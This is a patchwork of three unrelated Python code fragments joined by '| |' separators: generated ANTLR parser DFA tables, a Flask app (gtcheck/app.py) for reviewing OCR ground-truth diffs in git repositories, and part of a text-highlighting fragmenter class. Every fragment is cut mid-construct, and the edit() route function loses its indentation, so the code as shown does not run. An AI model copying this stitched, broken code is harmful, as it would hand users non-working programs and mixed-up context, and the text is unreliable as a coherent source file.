DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #70
class DFA70(DFA):
    pass

    def specialStateTransition(self_, s, input):
        # convince pylint that my self_ magic is ok ;)
        # pylint: disable-msg=E0213

        # pretend we are a member of the recognizer
        # thus semantic predicates can be evaluated
        self = self_.recognizer

        _s = s

        # Each special state evaluates exactly one syntactic predicate: on
        # success the DFA jumps to that alternative's accept state, otherwise
        # it falls back to state 1.  The table below collapses the 17
        # structurally identical branches of the generated code into
        # ``state -> (predicate name, accept state)``.
        # NOTE: hand-refactored generated code -- re-apply if the parser is
        # regenerated from the grammar.
        preds = {
            0: ("synpred135_sol", 49),
            1: ("synpred136_sol", 64),
            2: ("synpred137_sol", 81),
            3: ("synpred138_sol", 83),
            4: ("synpred139_sol", 98),
            5: ("synpred142_sol", 113),
            6: ("synpred144_sol", 128),
            7: ("synpred146_sol", 143),
            8: ("synpred147_sol", 158),
            9: ("synpred148_sol", 173),
            10: ("synpred149_sol", 188),
            11: ("synpred153_sol", 203),
            12: ("synpred155_sol", 218),
            13: ("synpred156_sol", 233),
            14: ("synpred157_sol", 248),
            15: ("synpred158_sol", 263),
            16: ("synpred169_sol", 278),
        }

        if s in preds:
            pred_name, accept = preds[s]
            # The generated code reads (and discards) one symbol of lookahead
            # before marking/rewinding the stream; keep that call order.
            input.LA(1)
            index = input.index()
            input.rewind()

            s = -1
            if getattr(self, pred_name)():
                s = accept
            else:
                s = 1

            input.seek(index)
            if s >= 0:
                return s

        if self._state.backtracking > 0:
            raise BacktrackingFailed

        nvae = NoViableAltException(self_.getDescription(), 70, _s, input)
        self_.error(nvae)
        raise nvae
# lookup tables for DFA #71
# NOTE: machine-generated ANTLR DFA tables (packed, run-length encoded
# strings).  Do not edit by hand -- regenerate from the grammar instead.
DFA71_eot = DFA.unpack(
    u"\50\uffff"
    )

DFA71_eof = DFA.unpack(
    u"\1\2\47\uffff"
    )

DFA71_min = DFA.unpack(
    u"\1\62\1\5\46\uffff"
    )

DFA71_max = DFA.unpack(
    u"\1\u0083\1\154\46\uffff"
    )

DFA71_accept = DFA.unpack(
    u"\2\uffff\1\2\26\uffff\1\1\16\uffff"
    )

DFA71_special = DFA.unpack(
    u"\50\uffff"
    )

DFA71_transition = [
    DFA.unpack(u"\2\2\1\uffff\5\2\2\uffff\1\2\2\uffff\2\2\4\uffff\2"
    u"\2\12\uffff\1\1\2\2\22\uffff\4\2\3\uffff\27\2"),
    DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff"
    u"\1\2\25\uffff\1\2\10\uffff\1\2\7\uffff\1\2\12\uffff\2\2\1\31\5"
    u"\uffff\1\2\10\uffff\14\2"),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u"")
]

# class definition for DFA #71
class DFA71(DFA):
    pass
# lookup tables for DFA #72
# NOTE: machine-generated ANTLR DFA tables (packed, run-length encoded
# strings).  Do not edit by hand -- regenerate from the grammar instead.
DFA72_eot = DFA.unpack(
    u"\50\uffff"
    )

DFA72_eof = DFA.unpack(
    u"\1\2\47\uffff"
    )

DFA72_min = DFA.unpack(
    u"\1\62\1\5\46\uffff"
    )

DFA72_max = DFA.unpack(
    u"\1\u0083\1\154\46\uffff"
    )

DFA72_accept = DFA.unpack(
    u"\2\uffff\1\2\26\uffff\1\1\16\uffff"
    )

DFA72_special = DFA.unpack(
    u"\50\uffff"
    )

DFA72_transition = [
    DFA.unpack(u"\2\2\1\uffff\5\2\2\uffff\1\2\2\uffff\2\2\4\uffff\2"
    u"\2\12\uffff\1\1\2\2\22\uffff\4\2\3\uffff\27\2"),
    DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff"
    u"\1\2\25\uffff\1\2\10\uffff\1\2\7\uffff\1\2\12\uffff\2\2\1\31\5"
    u"\uffff\1\2\10\uffff\14\2"),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u"")
]

# class definition for DFA #72
class DFA72(DFA):
    pass
# lookup tables for DFA #79
# NOTE: machine-generated ANTLR DFA tables (packed, run-length encoded
# strings).  Do not edit by hand -- regenerate from the grammar instead.
DFA79_eot = DFA.unpack(
    u"\21\uffff"
    )

DFA79_eof = DFA.unpack(
    u"\21\uffff"
    )

DFA79_min = DFA.unpack(
    u"\1\5\20\uffff"
    )

DFA79_max = DFA.unpack(
    u"\1\154\20\uffff"
    )

DFA79_accept = DFA.unpack(
    u"\1\uffff\1\1\1\2\16\uffff"
    )

DFA79_special = DFA.unpack(
    u"\21\uffff"
    )

DFA79_transition = [
    DFA.unpack(u"\1\2\13\uffff\5\2\1\uffff\2\2\2\uffff\2\2\1\uffff\1"
    u"\2\25\uffff\1\2\10\uffff\1\2\1\1\6\uffff\2\2\11\uffff\2\2\6\uffff"
    u"\1\2\10\uffff\14\2"),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u"")
]

# class definition for DFA #79
class DFA79(DFA):
    pass
# lookup tables for DFA #78
# NOTE: machine-generated ANTLR DFA tables (packed, run-length encoded
# strings).  Do not edit by hand -- regenerate from the grammar instead.
DFA78_eot = DFA.unpack(
    u"\20\uffff"
    )

DFA78_eof = DFA.unpack(
    u"\20\uffff"
    )

DFA78_min = DFA.unpack(
    u"\1\5\17\uffff"
    )

DFA78_max = DFA.unpack(
    u"\1\154\17\uffff"
    )

DFA78_accept = DFA.unpack(
    u"\1\uffff\1\1\15\uffff\1\2"
    )

DFA78_special = DFA.unpack(
    u"\20\uffff"
    )

DFA78_transition = [
    DFA.unpack(u"\1\1\13\uffff\5\1\1\uffff\2\1\2\uffff\2\1\1\uffff\1"
    u"\1\25\uffff\1\1\10\uffff\1\1\7\uffff\1\1\1\17\11\uffff\2\1\6\uffff"
    u"\1\1\10\uffff\14\1"),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u"")
]

# class definition for DFA #78
class DFA78(DFA):
    pass
# lookup tables for DFA #80
# NOTE: machine-generated ANTLR DFA tables (packed, run-length encoded
# strings).  Do not edit by hand -- regenerate from the grammar instead.
DFA80_eot = DFA.unpack(
    u"\24\uffff"
    )

DFA80_eof = DFA.unpack(
    u"\24\uffff"
    )

DFA80_min = DFA.unpack(
    u"\1\5\23\uffff"
    )

DFA80_max = DFA.unpack(
    u"\1\u0087\23\uffff"
    )

DFA80_accept = DFA.unpack(
    u"\1\uffff\1\2\1\1\21\uffff"
    )

DFA80_special = DFA.unpack(
    u"\24\uffff"
    )

DFA80_transition = [
    DFA.unpack(u"\1\2\22\uffff\5\2\1\uffff\1\2\36\uffff\2\2\1\uffff"
    u"\1\1\4\uffff\1\2\2\uffff\1\2\3\uffff\1\2\3\uffff\1\2\7\uffff\2"
    u"\2\2\uffff\1\2\1\uffff\1\2\5\uffff\1\2\37\uffff\1\2\1\uffff\2\2"),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u""),
    DFA.unpack(u"")
]

# class definition for DFA #80
class DFA80(DFA):
    pass
# lookup tables for DFA #81
DFA81_eot = DFA.unpack(
u"\152\uffff"
)
| |
<filename>gtcheck/app.py
#!/usr/bin/env python3
import datetime
import imghdr
import json
import logging
import math
import os
import re
import shutil
import webbrowser
from collections import defaultdict
from configparser import NoSectionError
from hashlib import sha256, sha1
from logging import Formatter
from logging.handlers import RotatingFileHandler
from pathlib import Path
from subprocess import check_output
import markdown
from flask import Flask, render_template, request, Markup, flash, session, redirect, url_for
from git import Repo, InvalidGitRepositoryError, GitCommandError
from .config import URL, PORT, LOG_DIR, DATA_DIR, SYMLINK_DIR, SUBREPO_DIR, ADMINPASSWORD, USERPASSWORD, SECRET_KEY
app = Flask(__name__, instance_path=str(Path(__file__).parent.resolve().joinpath("instance")))
def modifications(difftext):
    """
    Extract the original and the modified characters as tuples into a list.
    This information is used e.g. for the commit-message.
    :param difftext: git word-diff text, deletions marked ``[-..-]`` and
        additions marked ``{+..+}``
    :return: list of ``[deleted, added]`` pairs
    """
    mods = []
    last_pos = 1
    # Walk all word-diff markers in order of appearance.
    for mod in re.finditer(r'(\[-(.*?)-\]|{\+(.*?)\+})', difftext):
        sub = mod[2] if mod[2] is not None else ""  # deleted text, if this is a [-..-] marker
        add = mod[3] if mod[3] is not None else ""  # added text, if this is a {+..+} marker
        # An addition starting exactly where the previous marker ended belongs
        # to the same modification: fill it into the previous pair instead of
        # appending a new one.
        if add != "" and len(mods) > 0 and last_pos == mod.regs[0][0]:
            if mods[len(mods) - 1][1] == "":
                mods[len(mods) - 1][1] = add
                continue
        last_pos = mod.regs[0][1]
        mods.append([sub, add])
    return mods
def color_diffs(difftext):
    """
    Wrap git word-diff markers in HTML so additions render green and
    deletions render red.
    :param difftext: Compared text, differences are marked with {+ ADD +} [- DEL -]
    :return: the text with the markers replaced by styled ``<span>`` tags
    """
    replacements = (
        ('{+', '<span style="color:green">'),
        ('+}', '</span>'),
        ('[-', '<span style="color:red">'),
        ('-]', '</span>'),
    )
    for marker, tag in replacements:
        difftext = difftext.replace(marker, tag)
    return difftext
def get_diffs(difftext):
    """
    Return the passages which differ, split into the original-side and the
    modified-side text.
    :param difftext: git word-diff text with ``[-..-]``/``{+..+}`` markers
    :return: tuple ``(deleted passages, added passages)``, space-joined
    """
    removed = [chunk.partition('-]')[0]
               for chunk in difftext.split('[-') if '-]' in chunk]
    added = [chunk.partition('+}')[0]
             for chunk in difftext.split('{+') if '+}' in chunk]
    return ' '.join(removed), ' '.join(added)
def surrounding_images(img, regex):
    """
    Finding predecessor and successor images to gain more context for the user.
    The basic regex to extract the pagenumber can be set on the setup page and
    is kept in the repo_data['regexnum'] variable (default ``^(.*?)(\\d+)(\\D*)$``).
    :param img: image path (pathlib.Path)
    :param regex: regex pattern whose second group captures the page number
    :return: tuple (previous image, next image); "" where the file is missing
    """
    match = re.match(regex, img.name)
    page = int(match[2])
    # Preserve the zero-padding width of the captured number.
    width = match.regs[2][1] - match.regs[2][0]
    prefix = img.name[:match.regs[1][1]]
    suffix = img.name[match.regs[3][0]:]
    neighbours = []
    for offset in (-1, 1):
        candidate = img.parent.joinpath(f"{prefix}{page + offset:0{width}d}{suffix}")
        if not candidate.exists():
            app.logger.info(f"File:{candidate.name} not found!")
            candidate = ""
        neighbours.append(candidate)
    return neighbours[0], neighbours[1]
def get_gitdifftext(orig, diff, repo):
    """
    Compares two strings via git hash-objects
    :param orig: Original string
    :param diff: Modified string
    :param repo: repo instance (not used here; kept for a uniform signature)
    :return: the word-diff hunk text (everything after the last ``@@`` header)
    """
    # Hash both strings the way git hashes blobs ("blob <len>\0<content>")
    # and let ``git diff`` compare the two object ids.
    # NOTE(review): this assumes the corresponding blob objects already exist
    # in the object database (e.g. written by an earlier add/commit);
    # otherwise ``git diff`` fails -- TODO confirm against callers.
    item_a = sha1((f'blob {len(orig)}\0{orig}').encode('utf-8'))
    item_b = sha1((f'blob {len(diff)}\0{diff}').encode('utf-8'))
    return check_output(['git', 'diff', '-p', '--word-diff', str(item_a.hexdigest()), str(item_b.hexdigest())]).decode(
        'utf-8').split('@@')[-1].strip()
def get_difftext(origtext, item, folder, repo):
    """
    Compares the original and a modified string
    :param origtext: original text string
    :param item: git-python diff item instance
    :param folder: repo folder (pathlib.Path)
    :param repo: repo instance
    :return: word-diff text of the modification ("" if comparison failed)
    """
    # The "<<<<<<< HEAD" indicates a merge conflicts and need other operations
    if "<<<<<<< HEAD\n" in origtext:
        # Extract the two conflicting sides from the file on disk and diff
        # them against each other.
        with open(folder.joinpath(item.a_path), 'r') as fin:
            mergetext = fin.read().split("<<<<<<< HEAD\n")[-1].split("\n>>>>>>>")[0].split("\n=======\n")
        difftext = get_gitdifftext(mergetext[0], mergetext[1], repo)
    else:
        try:
            # Drop the hunk header line, keep only the diff body.
            difftext = "".join(item.diff.decode('utf-8').split("\n")[1:])
        except UnicodeDecodeError as ex:
            # The UnicodeDecodeError mostly appears if the original character is a combination of unicode symbols
            # e.g. ä -> e+diacritic_mark and the modified character only differs in one and not all parts e.g. ö.
            app.logger.warning(f"File:{item.a_path} Warning the diff text could not be decoded! Error:{ex}")
            try:
                # Fall back to diffing the raw blob contents via git.
                difftext = get_gitdifftext(origtext, item.b_blob.data_stream.read().decode(), repo)
            except Exception as ex2:
                app.logger.warning(f"File:{item.a_path} Both files could not be compared! Error:{ex2}")
                difftext = ""
    return difftext
class GTDiffObject(object):
    """Wrap the git diff information for a single ground-truth file.

    Collects the original text, the modified text, the word-diff between the
    two and an HTML-colorized version of that diff for display in the UI.
    """

    def __init__(self, repo, repo_path, filename, add_all=False):
        """
        :param repo: git.Repo instance the file belongs to
        :param repo_path: pathlib.Path of the repository working tree
        :param filename: file path relative to the repository
        :param add_all: treat a file without any diff entry as newly added
        """
        self.repo = repo
        self.repo_path = repo_path
        self.filename = filename
        self.fpath = self.repo_path.joinpath(filename)
        self.item = None        # git diff item for the file (None if no diff)
        self.origtext = ''      # text before the modification
        self.difftext = ''      # raw word-diff between orig and mod
        self.modtext = ''       # text after the modification
        self.modtype = ''       # kind of change, e.g. "new", "del", "merge"
        self.diffcolored = ''   # HTML-colorized diff for the UI
        self.__diff__(add_all)

    def __diff__(self, add_all):
        """Populate the diff attributes from the repository state."""
        self.item = self.repo.index.diff(None, paths=[self.filename], create_patch=True, word_diff_regex='.')
        # TODO: Check if this is necessary
        if not self.item:
            self.item = self.repo.index.diff('HEAD', paths=[self.filename], create_patch=True, word_diff_regex='.')
        if not self.item and add_all:
            # No diff entry at all: treat the file as a brand-new addition.
            self.path = self.filename
            self.origtext = ""
            self.difftext = open(Path(self.repo.working_dir).joinpath(self.filename), 'r').read()
            self.modtext = self.difftext
            self.modtype = "new"
            self.diffcolored = "<span style='color:green'>The file gets added " \
                               "when committed and deleted when stashed!</span>"
        else:
            if self.item:
                self.item = self.item[0]
            else:
                #self.item = None
                # Stage the file so a diff against HEAD becomes visible.
                self.repo.git.add('-A', self.filename)
                item = self.repo.index.diff('HEAD', paths=[self.filename])
                if item != []:
                    self.item = item[0]
                else:
                    self.item = None
            if self.item and (self.item.a_blob or self.item.b_blob):
                self.get_modtext()

    def get_modtext(self):
        """Derive modtype, origtext, modtext and the colorized diff."""
        # First token of ``git status --porcelain`` is the change type letter.
        self.modtype = self.repo.git.status('--porcelain', self.filename).split(' ')[0]
        try:
            self.origtext = self.item.a_blob.data_stream.read().decode('utf-8').lstrip(" ")
            self.path = self.item.a_path
        except:
            # NOTE(review): bare except -- presumably guards against a missing
            # a_blob (newly added file); narrowing the exception would be safer.
            self.origtext = ""
            self.path = self.item.b_path
        self.mergetext = []
        if self.modtype == "A":
            if self.origtext != "":
                self.modtext = self.origtext
                self.origtext = ""
            self.modtype = "new"
            self.diffcolored = "<span style='color:green'>This untracked file gets added " \
                               "when committed and deleted when stashed!</span>"
            return
        elif self.modtype == "D":
            # NOTE(review): ``self.modtext`` is still "" at this point, so this
            # condition never holds -- ``self.origtext`` was probably meant.
            if self.modtext != "":
                self.modtext = self.origtext
                self.origtext = ""
            self.modtype = "del"
            self.modtext = ""
            self.diffcolored = "<span style='color:red'>This file gets deleted " \
                               "when committed and restored when stashed!</span>"
            return
        self.difftext = get_difftext(self.origtext, self.item, self.repo_path, self.repo)
        self.diffcolored = color_diffs(self.difftext)
        if self.modtype == "M":
            self.modtype = "merge"
            # NOTE(review): ``self.mergetext`` is always the empty list set
            # above, so this raises IndexError -- it looks like the merge
            # sides were meant to be filled in beforehand; confirm.
            self.modtext = self.mergetext[1]
        else:
            self.modtext = self.repo_path.absolute().joinpath(self.item.b_path).open().read().lstrip(" ")

    def diff_only_in_cc(self):
        # True if original and modified text differ only in leading/trailing
        # whitespace (and the stripped original is non-empty).
        return self.origtext.strip() == self.modtext.strip() and self.origtext.strip() != ""

    def validate_filter(self, filter_all, filter_from, filter_to):
        """Return True if the configured filters say this diff should be skipped."""
        # Apply filter options
        if filter_all + filter_from + filter_to != '':
            if filter_all != '':
                # Pattern must occur in either version of the text.
                if not (re.search(rf"{filter_all}", self.origtext) or
                        re.search(rf"{filter_all}", self.modtext)):
                    return True
            if filter_from + filter_to != '':
                # Patterns must occur in the deleted resp. added passages.
                origdiff, moddiff = get_diffs(self.difftext)
                if not (re.search(rf"{filter_from}", origdiff) and
                        re.search(rf"{filter_to}", moddiff)):
                    return True
        return False

    def mods(self):
        # List of [deleted, added] pairs, e.g. for the commit message.
        return modifications(self.difftext)
def from_list_to_list(repo_data, from_list='diff_list', to_list='skipped', index=0, all=False):
    """
    Move entries between two list-valued keys of ``repo_data`` (in place).

    :param repo_data: dict holding the per-repository state lists
    :param from_list: key of the source list
    :param to_list: key of the destination list
    :param index: position in the source list to move (ignored if ``all``)
    :param all: move every entry, prepending the source list to the target
    :return: None
    """
    if not all:
        moved = repo_data[from_list].pop(index)
        repo_data[to_list].append(moved)
    else:
        repo_data[to_list] = repo_data[from_list] + repo_data[to_list]
        repo_data[from_list] = []
    return
@app.route('/gtcheck/edit/<group_name>/<repo_path_hash>/<subrepo>', methods=['GET', 'POST'])
def gtcheck(group_name, repo_path_hash, subrepo, repo=None, repo_data=None):
    """
    Gathers the information to render the gtcheck
    :param group_name: repository group the repo belongs to
    :param repo_path_hash: hash identifying the repository path
    :param subrepo: subrepository name
    :param repo: already-opened git repo (passed on the recursive call)
    :param repo_data: already-loaded state dict (passed on the recursive call)
    :return: rendered template for the next file to check
    """
    repo_data_path = get_repo_data_path(group_name, repo_path_hash, subrepo)
    if repo_data is None:
        repo_data = get_repo_data(repo_data_path)
    if repo is None:
        repo = get_repo(repo_data.get('path'))
    repo_path = Path(repo_data.get('path'))
    username, email = get_git_credentials(repo)
    # Diff Head: number of files already staged for commit
    diff_head = repo.git.diff('--cached', '--shortstat').strip().split(" ")[0]
    if not repo_data.get('diff_list') or len(repo_data.get('diff_list')) <= 0:
        # (Re)collect all modified ground-truth files in human-friendly order
        repo_data['diff_list'] = alphanum_sort([item.a_path for item in repo.index.diff(None) if ".gt.txt" in item.a_path])
    diff_list = repo_data.get('diff_list')[:]
    for filename in diff_list:
        gtdiff = GTDiffObject(repo, repo_path, filename)
        if gtdiff.item is None:
            # Nothing left to diff for this file: move it aside and continue
            from_list_to_list(repo_data, from_list='diff_list', to_list='removed_list')
            continue
        # BUGFIX: was ``repo.data('skipcc')`` -- git.Repo has no ``data``
        # attribute; the skip-control-characters flag is stored in repo_data
        # (cf. the surrounding ``repo_data.get(...)`` look-ups).
        if gtdiff.diff_only_in_cc() and repo_data.get('skipcc'):
            if repo_data.get('addcc', None) is not None:
                from_list_to_list(repo_data, from_list='diff_list', to_list='finished_list')
                repo.git.add(str(filename), A=True)
            else:
                from_list_to_list(repo_data, from_list='diff_list', to_list='skipped_list')
            continue
        if gtdiff.validate_filter(repo_data.get('filter_all'), repo_data.get('filter_from'), repo_data.get('filter_to')):
            from_list_to_list(repo_data, from_list='diff_list', to_list='skipped_list')
            continue
        if diff_head:
            commitmsg = f"Staged Files: {diff_head}"
        else:
            commitmsg = f"{repo_path.name}: {', '.join([orig + ' -> ' + mod for orig, mod in gtdiff.mods()])}"
        repo_data['modtext'] = gtdiff.modtext
        repo_data['modtype'] = gtdiff.modtype
        repo_data['fname'] = str(gtdiff.fpath)
        repo_data['fpath'] = str(gtdiff.path)
        # Group the configured custom keyboard keys into rows of ten
        custom_keys = [' '.join(repo_data.get('custom_keys')[i:i + 10]) for i in
                       range(0, len(repo_data.get('custom_keys')), 10)]
        # Locate the image(s) belonging to the gt file (served via symlink dir)
        if repo_data['mode'] == 'main':
            inames = [Path(SYMLINK_DIR).joinpath(repo_path_hash).joinpath(str(iname.relative_to(repo_data['path'])))
                      for iname in gtdiff.fpath.parent.glob(f"{gtdiff.fpath.name.replace('gt.txt', '')}*")
                      if imghdr.what(iname)]
        else:
            inames = [Path(SYMLINK_DIR).joinpath(repo_path_hash).joinpath(str(iname.relative_to(repo_data['parent_repo_path']))) for iname in
                      Path(repo_data['parent_repo_path']).glob(f"{str(gtdiff.fpath.relative_to(repo_data.get('path'))).replace('gt.txt', '')}*")
                      if imghdr.what(iname)]
        img_out = inames[0] if inames else None
        if not img_out:
            write_repo_data(repo_data_path, repo_data)
            return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
                                   group_name=group_name,
                                   branch=repo.active_branch, username=username,
                                   email=email, commitmsg=commitmsg,
                                   difftext=Markup(gtdiff.diffcolored), origtext=gtdiff.origtext, modtext=gtdiff.modtext,
                                   files_left=str(len(repo_data.get('diff_list'))),
                                   iname="No image", fname=gtdiff.fpath.name, skipped=len(repo_data.get('skipped_list')),
                                   vkeylang=repo_data.get('vkeylang'), custom_keys=custom_keys,
                                   font=repo_data.get('font'))
        else:
            prev_img, post_img = surrounding_images(img_out, repo_data.get('regexnum'))
            write_repo_data(repo_data_path, repo_data)
            return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
                                   group_name=group_name,
                                   branch=repo.active_branch, username=username,
                                   email=email, commitmsg=commitmsg,
                                   image=str(Path(img_out).relative_to(Path(SYMLINK_DIR).parent)),
                                   previmage=str(Path(prev_img).relative_to(Path(
                                       SYMLINK_DIR).parent)) if prev_img != "" else "",
                                   postimage=str(Path(post_img).relative_to(Path(
                                       SYMLINK_DIR).parent)) if post_img != "" else "",
                                   difftext=Markup(gtdiff.diffcolored), origtext=gtdiff.origtext,
                                   modtext=gtdiff.modtext,
                                   files_left=str(len(repo_data.get('diff_list'))),
                                   iname=img_out.name, fname=gtdiff.fpath.name,
                                   skipped=len(repo_data.get('skipped_list')),
                                   vkeylang=repo_data.get('vkeylang'), custom_keys=custom_keys,
                                   font=repo_data.get('font'))
    else:
        # for-else: the loop ran to completion, i.e. every file was skipped,
        # finished or removed without rendering a diff page.
        if diff_head:
            commitmsg = f"Staged Files: {diff_head}"
            modtext = f"Please commit the staged files! You skipped {len(repo_data.get('skipped_list'))} files."
            write_repo_data(repo_data_path, repo_data)
            return render_template("gtcheck.html", repo_data=repo_data, repo_path_hash=repo_path_hash, subrepo=subrepo,
                                   group_name=group_name,
                                   username=username, email=email, commitmsg=commitmsg, modtext=modtext, custom_keys='',
                                   files_left="0")
        if repo_data.get('diff_list', None) == []:
            write_repo_data(repo_data_path, repo_data)
            return render_template("nofile.html")
        write_repo_data(repo_data_path, repo_data)
        return gtcheck(group_name, repo_path_hash, subrepo, repo, repo_data)
def pop_idx(repo_data, lname, popidx):
    """
    Pops the item from the index off a list, if the index is in the range
    :param repo_data: dict holding the list
    :param lname: Name of the list
    :param popidx: Index to pop
    :return: None (the list is modified in place)
    """
    target = repo_data.get(lname)
    # Out-of-range indices are silently ignored.
    if popidx < len(target):
        target.pop(popidx)
def set_git_credentials(repo, username, email, level='repository'):
    """Set the git credentials name and email address.

    A stale ``config.lock`` left behind by an aborted git process would make
    the config writer fail, so it is removed first.  Failures are logged and
    otherwise ignored (best effort -- the UI can still work without stored
    credentials).

    :param repo: git.Repo instance to configure
    :param username: value for the ``name`` entry
    :param email: value for the ``email`` entry
    :param level: config section to write to (default ``repository``)
    """
    try:
        lockfile = Path(repo.git_dir).joinpath('config.lock')
        if lockfile.exists():
            lockfile.unlink()
        repo.config_writer().set_value(level, 'name', username).release()
        repo.config_writer().set_value(level, 'email', email).release()
    except Exception:
        # Was a bare ``except: pass``: narrowed so SystemExit/KeyboardInterrupt
        # are not swallowed, and the failure is at least logged.
        app.logger.exception("Could not set git credentials")
def get_git_credentials(repo, level='repository'):
    """Return the git credentials name and email address.

    :param repo: git.Repo instance to read from
    :param level: config section to read (default ``repository``)
    :return: tuple ``(name, email)``; empty strings if the section is missing
    """
    name, mail = "", ""
    try:
        name = repo.config_reader().get_value(level, 'name')
        mail = repo.config_reader().get_value(level, 'email')
    except NoSectionError:
        # No credentials configured at this level yet.
        pass
    return name, mail
@app.route('/gtcheck/edit/update/<group_name>/<repo_path_hash>/<subrepo>', methods=['GET', 'POST'])
def edit(group_name, repo_path_hash, subrepo):
"""
Process the user input from gtcheck html pages
:return:
"""
data = | |
be called with an iterator of ALL tokens from the text,
with the tokens for matched terms having the ``matched`` attribute set
to True.
If this method returns False, the fragmenter's ``fragment_matches``
method will be called with a LIST of matching tokens.
"""
return True
def fragment_tokens(self, text, all_tokens):
    """Yields :class:`Fragment` objects based on the tokenized text.

    Abstract -- subclasses that retokenize must override this method.

    :param text: the string being highlighted.
    :param all_tokens: an iterator of :class:`analysis.Token`
        objects from the string.
    """
    raise NotImplementedError
def fragment_matches(self, text, matched_tokens):
    """Yields :class:`Fragment` objects based on the text and the matched
    terms.

    Abstract -- subclasses that do not retokenize must override this method.

    :param text: the string being highlighted.
    :param matched_tokens: a list of :class:`analysis.Token` objects
        representing the term matches in the string.
    """
    raise NotImplementedError
class WholeFragmenter(Fragmenter):
    """Doesn't fragment the token stream. This object simply returns the
    entire stream as one "fragment". This is useful if you want to highlight
    the whole text.

    Note that even if you use the `WholeFragmenter`, the highlight code will
    return no fragment if no terms matched in the given field. To return the
    whole fragment even in that case, call `highlights()` with `minscore=0`::

        # Query where no terms match in the "text" field
        q = query.Term("tag", "new")

        r = mysearcher.search(q)
        r.fragmenter = highlight.WholeFragmenter()
        r.formatter = highlight.UppercaseFormatter()
